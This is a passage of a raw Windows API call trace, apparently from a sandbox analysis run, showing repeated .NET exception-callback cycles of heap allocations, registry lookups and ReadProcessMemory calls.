hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.783] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.783] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.783] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7660 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c75a0 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7600 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c74b0 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.784] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.784] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.784] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.784] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.784] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.784] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.784] GetThreadId (Thread=0x38c) returned 0x8cc [0078.784] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.784] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bba30 [0078.784] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.784] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.784] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.784] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.784] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.784] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.784] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.784] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.784] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.785] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.785] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.785] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.785] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.785] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.785] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.785] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.785] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.785] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.785] GetLastError () returned 0xcb [0078.785] SetLastError (dwErrCode=0xcb) [0078.785] GetLastError () returned 0xcb [0078.785] SetLastError (dwErrCode=0xcb) [0078.785] GetLastError () returned 0xcb [0078.785] SetLastError (dwErrCode=0xcb) [0078.786] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.786] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.786] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.786] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.786] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.786] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.786] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.786] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.786] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.786] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.786] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.786] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.786] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.786] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.786] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.786] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.787] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7030 [0078.787] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.787] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7570 [0078.787] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.787] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c72d0 [0078.787] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.787] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c71b0 [0078.787] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.787] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.787] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bba30 | out: hHeap=0x22b349a0000) returned 1 [0078.787] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.787] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.787] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.787] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.787] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7030 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7570 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c72d0 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c71b0 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.788] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.788] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.788] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.788] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.788] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.788] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.788] GetThreadId (Thread=0x38c) returned 0x8cc [0078.788] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.788] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bbb10 [0078.788] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.788] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.788] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.788] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.788] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.788] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.789] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.789] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.789] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.789] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.789] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.789] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.789] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.789] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.789] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.789] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.789] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.789] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.789] GetLastError () returned 0xcb [0078.789] SetLastError (dwErrCode=0xcb) [0078.790] GetLastError () returned 0xcb [0078.790] SetLastError (dwErrCode=0xcb) [0078.790] GetLastError () returned 0xcb [0078.790] SetLastError (dwErrCode=0xcb) [0078.790] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.790] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.790] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.790] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.790] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.790] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.790] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.790] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.790] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.790] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.790] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.790] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.791] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.791] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.791] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.791] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.791] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7690 [0078.791] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.791] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7570 [0078.791] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.791] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c76c0 [0078.791] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.791] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c70c0 [0078.791] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.791] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.791] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bbb10 | out: hHeap=0x22b349a0000) returned 1 [0078.791] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7690 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7570 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c76c0 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c70c0 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.903] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.903] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.903] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.903] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.904] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.904] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.904] GetThreadId (Thread=0x38c) returned 0x8cc [0078.904] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.904] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bb4f0 [0078.904] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.904] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.904] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.904] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.904] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.904] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.904] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.904] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, 